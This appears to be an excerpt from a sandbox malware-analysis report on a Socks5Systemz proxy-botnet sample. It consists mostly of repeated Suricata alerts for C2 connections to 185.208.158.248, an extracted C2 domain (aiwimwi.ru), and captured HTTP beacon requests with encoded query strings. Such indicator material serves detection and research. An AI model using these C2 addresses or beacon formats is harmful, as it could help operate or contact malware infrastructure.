        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49876 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49857 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49857 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49904 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49869 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49904 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49788 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49852 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49908 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49883 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49827 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49911 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49933 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49852 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49908 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49926 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49883 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49933 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49926 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49911 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49940 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49940 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49896 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49975 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49794 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49975 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49982 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49982 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49896 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49794 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49946 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49946 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49961 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49952 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49969 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49952 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50003 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49776 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49776 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50009 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49961 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49969 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50046 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50046 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50009 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50020 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50054 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50054 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50059 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50059 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50051 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50051 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50034 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49806 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50003 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50072 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50072 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50055 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50073 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50034 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50070 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50069 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50070 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50020 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50055 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49920 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49920 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50052 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50052 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50069 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50057 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50026 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50026 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50058 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50079 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49806 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50066 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50066 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50068 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50058 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50079 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50068 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50057 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50073 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50078 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50074 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50056 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49996 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49996 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50053 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49989 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50074 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50053 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50056 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50040 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49989 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50040 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50050 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50078 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50050 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49915 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50049 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50049 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49915 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50075 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50067 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50075 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50062 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50060 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50067 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50062 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50060 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50077 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50077 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50076 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50076 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50071 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50071 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50061 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50061 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50065 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50065 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50064 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50064 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50063 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50063 -> 185.208.158.248:80
        Source: Malware configuration extractorURLs: aiwimwi.ru
        Source: global trafficTCP traffic: 192.168.2.4:49754 -> 89.105.201.183:2023
        Source: Joe Sandbox ViewIP Address: 185.208.158.248 185.208.158.248
        Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf713c6ea96983f HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
